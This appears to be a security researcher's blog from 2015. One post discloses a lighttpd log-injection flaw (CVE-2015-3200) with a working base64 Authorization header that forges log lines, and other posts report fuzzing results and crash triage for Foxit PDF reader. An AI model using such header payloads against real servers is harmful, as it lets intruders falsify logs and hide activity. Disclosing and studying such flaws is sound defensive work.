Monday, May 25, 2015


Last week I noticed a issue in lighttpd server source code, that made it possible to do log injections. I notified the developers and it was decided that because this issue does not result in RCE or DOS, but only affects reliability of the logs, it is better to make it public. So here it is (still vulnerable, but now you know that logs might be tampered with).

CVE: CVE-2015-3200
Software: Lighttpd
Type: Log injection
Bug track link:
Source code Location: http_auth.c:860
Vulnerable servers: Servers that use basic authentication
Description: When basic HTTP authentication base64 string does not contain colon character (or contains it after NULL byte - can be inserted inside base64 encoding), then that situation is logged with a string ": is missing in " and the simply decoded base64 string. This means that new lines, NULL byte and everything else can be encoded with base64 and are then inserted to logs as they are after decoding.

For example header "Authorization: Basic dGVzdAAKMjEwMC0wMS0wMSAwMDowMDowMDogKG1hZ2ljLmMuODU5KSBJVCdTIFRIRSBFTkQgT0YgVEhFIFdPUkxEIQ==" results in two log lines:
2015-05-14 12:55:54: (http_auth.c.859) : is missing in test
2100-01-01 00:00:00: (magic.c.859) IT'S THE END OF THE WORLD

On other subject: Does anyone know place in that requires basic authentication?

Monday, May 18, 2015

Foxit fuzzing ended

Because rebuilding my fuzzing machine took more time then predicted, I will not fuzz Foxit more and the results that I described the last time, are the final results (I do some additional analysis and then send them to the developers - it seems to be, that 15 unique crashes/memory corruptions are the final result after removing as many overlapses as I can with brief analysis). Also because my fuzzing environment changed (I used 32bit VMs and now use 64bit main machine directly), I can't also continue calculating the code coverage - the differences in the OS has created additional coverage paths and this would not give information I need for doing exact statistics.
With next filetype, I will do all the testing on the same environment and then hopefully will get better statistics up until the "end".

I will now continue using these 727 PDFs for testing other software and hopefully it will be as successful as it was with Foxit - it was surprising to get as many crashes/memory corruptions with only simple fuzzing on one home machine

Thursday, May 14, 2015

SITREP on Foxit fuzzing

Here comes the results of the half way through Foxit fuzzing (have to do a couple day pause, because there is some electricity work done nearby and I don't want to keep stuff running):

Total time: Around 1.5 weeks
Total number of crashes: 1699
Total number of testcases: ??? (when I was away, the main machine was shut down because of electricity works nearby, so I do have crash reports but not total number of tests done)
Unique crashe signatures: 23
Most probably not exploitable: 15 (NULL pointers and connected stuff)
Might be exploitable: 2 (one that seems to be arbitary write and one heap corruption)
No idea yet: 6 (some really strange crashes among them but some seem to be endless recursion type of stuff)

I also continued downloading new pdf files to test the predictions from last post. Have downloaded about 60K by now, need around 100K more.

Saturday, May 2, 2015

Fuzzing prep

For last 2 weeks I have done code coverage work on 366K pdf-s that i downloaded. As a base for code coverage I used Foxit pdf reader (it's a single exe file - much simpler to break apart in IDA and find all basic code blocks to use for monitoring - simple tracing is too slow) and as a tool I used my own scripts that I built using Python and WinAppDbg.
Explaining all of the work of finding pdf-s, writing (and optimizing - very important when doing stuff on one home machine!) code coverage tool and finding smallest subset of files, would be too long of a post to write for me now - but I thought that some of the statistics would be interesting

Base software: Foxit
Executable and dlls: Single exe file, size ~47MB
Basic code blocks found: 611927 (using IDA and my IDAPython script)
Files covered: 366027
Code blocks covered: 133661 (21.8%)
Final subset of files: 727 (0.2%)
Machines used: 5VM, each running single instance (sadly it was most stable solution when tested - have to try some other approches because it's just waste of resources)
Time cost: ~2 weeks
My own time spent (not counting tool developement time before): maybe couple of hours total. Tools did not crash or stop working even once (damn proud of it)

STATISTICS (taken during the process)

It's clear that I should have downloaded more files to get as good code coverage as possible with this method. The addition of new files to the resulting list did not stop even in the final patch - it was still 0.29 new files per 1000 input files covered. That means that for about every 3450 pdf files analyzed, I got one additional file to my final set. If the graph would be trusted, this trend should end in somewhere between 400K and 500K files. I will test this when I have downloaded additional files. But up until that, I will now start fuzzing the 727 files that I resulted with - let see what happens.

FIRST FUZZING RESULTS (first 10 hours of fuzzing Foxit)
All together 41 crashes and 10 unique ones(based of my tool that sorts by type and relative-EIP):
  • 1 unique writeAV - could be exploitable but quick glance did not strengthen that opinion
  • 6 unique readAV - all of them close to 0, so probably not exploitable
  • 1 unique readAV where it tries to read from address 0xBAADF00D, so uninitialized allocated heap (DEBUG version of HeapAlloc) content was used for pointer. Could be interesting
  • 2 unique crashes caused by unknown execptions that were not caught by the handlers - did not have time to investigate further